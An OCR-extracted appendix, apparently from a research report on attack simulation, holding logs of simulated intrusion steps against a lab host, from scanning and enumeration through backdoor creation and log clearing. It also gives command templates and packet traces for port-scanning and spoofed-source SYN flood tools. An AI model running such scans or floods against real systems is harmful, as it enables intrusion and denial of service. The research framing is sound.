TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

SNMP -agent 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

PWS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS-server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  Remote  Registry 
Service 

327 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

: 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

8080 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

138 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

21 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

23 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

137 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

80 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

21 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

23 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

8080 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

137 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

138 

343 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

347 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

351 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

352 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

353 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

356 

ENS 

NAT 

Enumerating  NetBIOS  Shares  with 
NetBIOS  Auditing  Tool 

Shared  Resources 

\\spiiran-erv\C 

356 

ENS 

NAT 

Enumerating  NetBIOS  Shares  with 
NetBIOS  Auditing  Tool 

Shared  Resources 

\\spiiran-erv\D 

359 

ENS 

NV 

Enumerating  NetBIOS  Shares  with 
net  view 

Shared  Resources 

\\spiiran-erv\C 

359 

ENS 

NV 

Enumerating  NetBIOS  Shares  with 
net  view 

Shared  Resources 

\\spiiran-erv\D 

364 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  N  etwork  Browser 

Users  ID  and  Psw 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

PWS 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

WINS-Server 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Running  Applications 

MS  SQL  Server  2000 
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368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  Remote  Registry 
Service 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  IIS 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

Mail- server 

374 

GAR 

AAF 

Anonymity  Access  to  FTP-server 

Anonymous  Access  to 

Ftp -server  was  gained 
successfully 

375 

END 

ATTACK  IS  OVER  !!! 

A4.13.  Total  log  of  the  intention  CVR  (“Confidentiality  Violation  Realization”)  realization 

Conditions  for  the  realization  of  malefactor’s  intention: 

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “Strong”  (1); 

•  protection  parameters  of  attacked  host  are  “Strong”  (1); 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1). 

Total  log  of  the  intention  CVR  realization  is  as  follows: 


mm 

A 

S 

Description 

ResultComment 

Result  |  FailResult 

i 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

2 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

5 

SPIH 

STIH 

TCP  connect  scan 

IP -addresses 

192.168.130.135 

Forbidden  Attack 
<STIH>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

9 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

12 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

16 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

19 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

24 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

25 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

28 

IO 

TS 

Telnet  Connection  and  SYST 
command  execution 

Operating  System 

31 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

32 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

36 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

40 

RE 

CNS 

Connection  -  null  sessions 

41 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

45 

UE 

FUE 

Finger  Users  Enumeration 

Users  ID  and  Psw 

49 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

49 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

49 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

49 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

49 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP-server 

52 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

WINS-Server 

52 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

FTP-server 

52 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

Mail- server 

52 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

DNS- server 
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55 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

55 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

55 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

55 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

55 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

56 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

56 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

56 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

56 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

56 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

64 

SPIH 

STIH 

TCP  connect  scan 

P -addresses 

192.168.130.135 

Forbidden  Attack 
<STIH>  blocked  by 
Firewall 

<CVR__Personal_ 

Firewall> 

69 

IO 

TZ 

Telnet  connection  and  message 
header  examination 

Operating  System 

70 

IO 

TZ 

Telnet  connection  and  message 
header  examination 

Operating  System 

71 

IO 

TZ 

Telnet  connection  and  message 
header  examination 

Operating  System 

75 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

76 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

77 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

80 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

81 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

82 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

83 

Cl 

NS 

Collection  of  additional 

information  from  DNS- server 

Host  Names 

87 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

88 

RE 

CNS 

Connection  -  null  sessions 

89 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

92 

RE 

SRE 

Getting  NFS  by  utilite  showmount 

Shared  Resources 

96 

UE 

CNS 

Connection  -  null  sessions 

97 

UE 

EUE 

Enumerating  Users  with  enum 

Users  ID  and  Psw 

100 

UE 

CNS 

Connection  -  null  sessions 

101 

UE 

PIUD 

Providing  Information  about  Users 
with  DumpSec 

Users  ID  and  Psw 

107 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR__Personal_ 
Firewall> 

108 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

112 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

115 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
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Firewall> 

116 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 

<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

120 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Mail- server 

120 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

DNS- server 

123 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

126 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

Forbidden  Attack 
<UREG>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

127 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

Forbidden  Attack 
<UREG>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

131 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 
<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

135 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

135 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

135 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

135 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

141 

GAR 

BFPG 

Brute  Force  Password  Guessing 
and  access  to  a  host 

146 

CVR 

RBV 

Reading  by  Virus 

File(s)  was 
(were)  read 

151 

IO 

IF 

ICMP  message  quoting 

Operating  System 

155 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

159 

RE 

SRE 

Getting  NFS  by  utilite  showmount 

Shared  Resources 

162 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

163 

RE 

CNS 

Connection  -  null  sessions 

166 

ENS 

NAT 

Enumerating  NetBIOS  Shares 
with  NetBIOS  Auditing  Tool 

Shared  Resources 

169 

ENS 

NAT 

Enumerating  NetBIOS  Shares 
with  NetBIOS  Auditing  Tool 

Shared  Resources 

172 

ENS 

NETD 

Enumerating  NetBIOS  Shares 
with  Netdom 

Shared  Resources 

175 

ENS 

DUMP 

Enumerating  NetBIOS  Shares 
with  DumpSec 

Shared  Resources 

178 

ENS 

NETV 

Enumerating  NetBIOS  Shares 
with  Netviewx 

Shared  Resources 

183 

UE 

FUE 

Finger  Users  Enumeration 

Users  ID  and  Psw 

189 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

Forbidden  Attack 

<UDUM>  blocked 
by  Firewall 
<CVR_Personal_ 
Firewall> 

198 

SPIH 

STIH 

TCP  connect  scan 

IP -addresses 

192.168.130.135 

Forbidden  Attack 
<STIH>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

199 

SPIH 

STIH 

TCP  connect  scan 

P -addresses 

Forbidden  Attack 
<STIH>  blocked  by 
192.168.130.135  Firewall 

<CVR_Personal_ 

Firewall> 

201 


203 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

192.168.130.135 

204 

SPIH 

SSIH 

TCP  SYN  scan 

IP -addresses 

210 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

Forbidden  Attack 
<DHS>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

211 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

Forbidden  Attack 
<DHS>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

212 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

Forbidden  Attack 
<DHS>  blocked  by 
Firewall 

<CVR_Personal_ 

Firewall> 

216 

IO 

RF 

FIN  Probe 

Operating  System 

217 

IO 

RF 

FIN  Probe 

Operating  System 

221 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

224 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

225 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

229 

RE 

SRE 

Getting  NFS  by  utilite  showmount 

Shared  Resources 

233 

UE 

FUE 

Finger  Users  Enumeration 

Users  ID  and  Psw 

237 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

237 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

237 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

243 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

246 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

192.168.130.135 

247 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

192.168.130.135 

251 

IO 

II 

ISN  sampling 

Operating  System 

252 

IO 

II 

ISN  sampling 

Operating  System 

256 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

260 

RE 

CNS 

Connection  -  null  sessions 

263 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

264 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

265 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

270 

UE 

FUE 

Finger  Users  Enumeration 

Users  ID  and  Psw 

274 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

274 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

274 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

274 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

275 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

275 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

285 

DS 

SF 

SYN  flood  (storm  of  inquiries  on 
installation  of  TCP  -connections) 

The  SYN  Flood 
Attack  was 
performed 
successfully. 

The  host  was 
accessed 

286 

CSS 

ABTH 

Access  on  Behalf  of  Trusted  Host 
to  a  host  with  SunOS  v.  1.4.x 

289 

ACE 

APF 

Access  to  Password  File 

290 

ACE 

WDPF 

Writing  of  user's  identifier  to 
Password  File 

291 

ACE 

MUID 

Modification  of  user  ID 
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292 

ACE 

MRF 

Writing  of  IP-address  of  an 
attacked  Host  in  the  File  .rhost 

293 

ACE 

CC 

Connection  Closing 

294 

CSS 

ATH 

Access  to  a  Target  Host  with 

Usage  of  the  r -command  rlogin 

297 

GAD 

SCP 

Search  for  Cleartext  password 

300 

GAD 

ETR 

Evaluating  Trust  Relations 

306 

CVR 

FRR 

FilE  (s)  Reading  Realization 

File(s)  reading 
was  executed 

309 

CBD 

ISF 

Infecting  Startup  Files 

Back  doors 
were  created 

312 

CBD 

ISF 

Infecting  Startup  Files 

Back  doors 
were  created 

315 

CBD 

SBJ 

Scheduling  Batch  Jobs 

318 

CBD 

SBJ 

Scheduling  Batch  Jobs 

322 

CT 

CL 

Clearing  of  Logs 

The  logs  were 
cleared 

325 

CT 

CL 

Clearing  of  Logs 

The  logs  were 
cleared 

333 

IBSD 

EFE 

External  File  Execution 

336 

GAD 

SCP 

Search  for  Cleartext  password 

342 

CVR 

FRR 

FilE  (s)  Reading  Realization 

File(s)  reading 
was  executed 

345 

CBD 

SBJ 

Scheduling  Batch  Jobs 

348 

CBD 

SBJ 

Scheduling  Batch  Jobs 

355 

PSA 

TH 

Password  Stealing  Attack  by 
Implantation  of  Trojan  Horse 

356 

PSA 

MP 

Mailing  password  and  access  to  a 
host 

Access  was  done 
successfully,  the 
password  is 

359 

EP 

LIKE 

Use  of  Known  Exploit 

364 

CVR 

FRR 

FilE  (s)  Reading  Realization 

File(s)  reading 
was  executed 

371 

IBSD 

EFE 

External  File  Execution 

374 

EP 

PC 

Password  Cracking 

379 

CVR 

FRR 

FilE  (s)  Reading  Realization 

File(s)  reading 
was  executed 

384 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

388 

IO 

IW 

Watching  of  an  initial  size  of  the 
TCP  window 

Operating  System 

389 

IO 

IW 

Watching  of  an  initial  size  of  the 
TCP  window 

Operating  System 

Windows  2000 

393 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

397 

RE 

CNS 

Connection  -  null  sessions 

400 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

401 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

402 

ENS 

SRVI 

Enumerating  NetBIOS  Shares 
with  Srvinfo  -s 

Shared  Resources 

407 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

411 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

411 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

411 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

411 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS- server 

417 

GAR 

AAF 

Anonymity  Access  to  FTP- server 

Anonymous 
Access  to  Ftp  - 
server  was 
gained 
successfully 

422 

CVR 

RBV 

Reading  by  Virus 

File(s)  was 
(were)  read 

425 

CBD 

IMM 

Installing  Monitoring  Mechanisms 

427 

END 

ATTACK  IS  OVER!!! 
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A4.2.  Logs  of  attack  traces  micro  -level  (network  traffic  level) 

A4.2.1.  Fragments  of  logs  for  the  program  scanports.exe  execution 

The  program  scanports.exe  is  intended  for  port  scanning  (SPIS). 

Template  for  calling  the  program  is  as  follows: 

scanports.exe  [scan  type]  -i  number  -hip. ip. ip. ip. port  -d  ip.  ip.  ip.  ip  -p  "ports"  -t  time 

where 

|  scan  type ]  is  one  of  the  following: 

-sS-  TCP  SYN  scan  (half  TCP -connection); 

-sT -  TCP  connect  scan; 

-sF  -  TCP  FIN  scan; 

-sX  -  TCP  Xmax  Tree  scan; 

-sN  -  TCP  NULL  scan. 

Other  arguments  are  as  follows: 

number  -  number  of  network  interface  ('Windump  -D'  can  be  used  for  listing  of  installed 
interfaces); 

ip. ip. ip.  ip. port  -  source  host  IP-address  and  port; 
ip.ip.ip.ip  -  destination  host  IP-address; 

" 'ports "  -  list  of  ports  for  scanning,  for  example,  -p  "10,20- 100,1011"; 
time  -  timeout  (in  seconds)  for  waiting  of  reply  (optional  parameter). 

Let  us  assume  that: 

•  the  malefactor’s  host  IP-address  is  192.168.130.136; 

•  the  malefactor’s  objective  is  to  learn  if  ftp  (port  21)  and  http  (port  80)  servers  on 
192.168.130.135  are  in  listening  mode. 

Therefore  for  TCP  connect  scan  the  malefactor  starts  scanports.exe  with  the  following  arguments: 
scanports.exe  -sT -i2  -h  192.168.130.136.1050  -d  192.168.130.135  -p  “21,80” 

The  fragment  of  log  for  port  scans  messages: 


Starting  scanports  v.1.0 
TCP  connect  scan. 

192.168. 130.136.1050- >192.168. 130.135.21  TCP  connect:  failed 
Port  is  seems  to  be  CLOSED. 

192.168. 130.136.1050- >192. 168. 130.135. 80  TCP  connect:  success 
Port  is  seems  to  be  OPEN. 


The  fragment  of  log  for  port  scans  network  packets: 

17:49:39.688430  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:39.688609  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  3131284274  win  0 
17:49:40.165818  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:40.165986  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1  win  0 
17:49:40.666568  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:40.666750  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1  win  0 

17:49:40.667878  IP  192.168.130.136.1050  >  192.168.130.135.80:  S  3131572065:3131572065(0)  win  64240 
17:49:40.668035  IP  192.168.130.135.80  >  192.168.130.136.1050:  S  1715932024:1715932024(0)  ack 
3131572066  win  64240 

17:49:40.668084  IP  192.168.130.136.1050  >  192.168.130.135.80:  .  ack  1  win  64240 

17:49:40.668565  IP  192.168.130.136.1050  >  192.168.130.135.80:  F  1:1(0)  ack  1  win  64240 
17:49:40.668696  IP  192.168.130.135.80  >  192.168.130.136.1050:  .  ack  2  win  64240 
17:49:40.682920  IP  192.168.130.135.80  >  192.168.130.136.1050:  F  1:1(0)  ack  2  win  64240 
17:49:40.683021  IP  192.168.130.136.1050  >  192.168.130.135.80:  .  ack  2  win  64240 
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In  the  first  six  rows  we  can  see,  that  the  hacker’s  host  is  trying  to  connect  to  192.168.130.135.21 
for  three  times.  The  server  is  sending  a  RST  packet  on  each  hacker’s  SYN  packet.  Therefore,  port  21 
is  closed. 

In  the  next  three  rows  the  hacker’s  host  sends  a  SYN  packet  to  port  80,  the  server  replies  by  a  TCP 
SYN  packet  with  ACK  flag,  and  the  hacker’s  host  acknowledges  it.  Therefore,  port  80  is  open. 

Last  four  strings  show  the  phase  of  closing  the  connection. 

For  TCP  SYN  scan  the  malefactor  starts  scanports.exe  with  the  following  arguments: 
scanports.exe  -sS  —i2  -h  192.168.130.136.1050  -d  192.168.130.135 -p  “21,80” 

The  fragment  of  log  for  port  scans  messages: 


Starting  scanports  v.1.0 

TCP  scanning  by  using  SYN  messages. 


Selected  device:  Winbond  W89C840(A)  100M  PCI  Adapter. 

1.  192. 168. 130. 136. 1050->192. 168. 130. 135.21  TCP  SYN  (seq:  12f79c  ack:  0) 

2.  192.168. 130. 135.21->192.168. 130.136.1050  TCP  RST  ACK  (seq:  0  ack:  12f79d) 

Port  21  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050->192. 168. 130. 135.21  TCP  RST  ACK  (seq:  12f79dack:  1) 

1.  192. 168. 130. 136. 1050->192. 168. 130. 135.80  TCP  SYN  (seq:  12f79c  ack:  0) 

2.  192.168. 130.135. 80->192. 168.130.136.1050  TCP  SYN  ACK  (seq:  8dbbd4b7  ack:  12179d) 

Port  80  is  seems  to  be  OPEN. 

3.  192. 168. 130.136. 1050->192. 168. 130. 135. 80  TCP  RST  ACK  (seq:  12f79d  ack:  8dbbd4b8) 

The  fragment  of  log  for  port  scans  network  packets: 

18:31:38.770016  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  1243036:1243036(0)  win  1024 
18:31:38.770205  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1243037  win  0 
18:31:39.771821  IP  192.168.130.136.1050  >  192.168.130.135.21:  R  1:1(0)  ack  1  win  1024 
18:31:39.781351  IP  192.168.130.136.1050  >  192.168.130.135.80:  S  1243036:1243036(0)  win  1024 
18:31:39.781564  IP  192.168.130.135.80  >  192.168.130.136.1050:  S  2377897143:2377897143(0)  ack  1243037 
win  64240 

18:31:39.781653  IP  192.168.130.136.1050  >  192.168.130.135.80:  R  1243037:1243037(0)  win  0 


A4.22.  Fragments  of  logs  for  program  SYNflood.exe  execution 


The  program  SYNflood.exe  is  intended  for  SYN  flood  (SF)  attack  (storm  of  inquiries  on 
installation  of  TCP -connections)  generation. 

Template  for  calling  the  program  is  as  follows: 

SYNflood.exe  -s  ip. ip. ip. ip  -d  ip. ip  .ip. ip. port 


where 

ip.ip.ip.ip  -  source  host  address  (as  a  rule  it  is  a  spoofed  IP-address); 
ip. ip. ip. ip. port  -  destination  host  address  and  port. 


Let  us  assume  that: 

•  the  malefactor’s  host  spoofed  IP-address  is  192.168.131.131; 

•  the  malefactor’s  objective  is  that  legal  users  cannot  connect  to  ftp  server  192.168.130.135.21. 
Therefore  the  malefactor  starts  SYNflood.exe  with  the  following  arguments: 

SYNflood.exe  -s  192.168.131.131  -d  192.168.130.135.21 
The  program  sends  requests  on  TCP  connections  faster  than  the  ftp-server  can  process  them. 

The  fragment  of  log  for  SYN  flood  attack: 

09:37:13.031611  IP  192.168.131.131.1025  >  192.168.130.135.21:  S  14310:14310(0)  win  1024 
09:37:13.031702  IP  192.168.130.135.21  >  192.168.131.131.1025:  S  1535992950:1535992950(0)  ack  14311  win 
64240  <mss  1460>  (DF) 

09:37:13.032104  IP  192.168.131.131.1026  >  192.168.130.135.21:  S  58070:58070(0)  win  1024 
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09:37:13.032128  IP  192.168.130.135.21  >  192.168.131.131.1026: 
64240  <mss  1460>  (DF) 

09:37:13.032497  IP  192.168.131.131.1027  >  192.168.130.135.21: 
09:37:13.032521  IP  192.168.130.135.21  >  192.168.131.131.1027: 
64240  crass  1460>  (DF) 

09:37:13.032862  IP  192.168.131.131.1028  >  192.168.130.135.21: 
09:37:13.032883  IP  192.168.130.135.21  >  192.168.131.131.1028: 
win  64240  crass  1460>  (DF) 

09:37:13.033232  IP  192.168.131.131.1029  >  192.168.130.135.21: 
09:37:13.033254  IP  192.168.130.135.21  >  192.168.131.131.1029: 
win  64240  crass  1460>  (DF) 

09:37:13.033600  IP  192.168.131.131.1030  >  192.168.130.135.21: 
09:37:13.033626  IP  192.168.130.135.21  >  192.168.131.131.1030: 
09:37:13.033978  IP  192.168.131.131.1031  >  192.168.130.135.21: 
09:37:13.033994  IP  192.168.130.135.21  >  192.168.131.131.1031: 
09:37:13.034421  IP  192.168.131.131.1032  >  192.168.130.135.21: 
09:37:13.034438  IP  192.168.130.135.21  >  192.168.131.131.1032: 
09:37:13.034835  IP  192.168.131.131.1033  >  192.168.130.135.21: 
09:37:13.034851  IP  192.168.130.135.21  >  192.168.131.131.1033: 
09:37:13.035227  IP  192.168.131.131.1034  >  192.168.130.135.21: 
09:37:13.035248  IP  192.168.130.135.21  >  192.168.131.131.1034: 
09:37:13.035615  IP  192.168.131.131.1035  >  192.168.130.135.21: 
09:37:13.035631  IP  192.168.130.135.21  >  192.168.131.131.1035: 
09:37:13.036004  IP  192.168.131.131.1036  >  192.168.130.135.21: 
09:37:13.036020  IP  192.168.130.135.21  >  192.168.131.131.1036: 
09:37:13.036400  IP  192.168.131.131.1037  >  192.168.130.135.21: 
09:37:13.036417  IP  192.168.130.135.21  >  192.168.131.131.1037: 
09:37:13.036804  IP  192.168.131.131.1038  >  192.168.130.135.21: 
09:37:13.036820  IP  192.168.130.135.21  >  192.168.131.131.1038: 
09:37:13.037248  IP  192.168.131.131.1039  >  192.168.130.135.21: 
09:37:13.037273  IP  192.168.130.135.21  >  192.168.131.131.1039: 
09:37:13.037640  IP  192.168.131.131.1040  >  192.168.130.135.21: 
09:37:13.037683  IP  192.168.130.135.21  >  192.168.131.131.1040: 
09:37:13.038080  IP  192.168.131.131.1041  >  192.168.130.135.21: 
09:37:13.038104  IP  192.168.130.135.21  >  192.168.131.131.1041: 
09:37:13.038480  IP  192.168.131.131. 1042  >  192.168.130.135.21: 
09:37:13.038503  IP  192.168.130.135.21  >  192.168.131.131.1042: 
09:37:13.038875  IP  192.168.131.131.1043  >  192.168.130.135.21: 
09:37:13.038901  IP  192.168.130.135.21  >  192.168.131.131.1043: 
09:37:13.039273  IP  192.168.131.131.1044  >  192.168.130.135.21 : 
09:37:13.039295  IP  192.168.130.135.21  >  192.168.131.131.1044: 
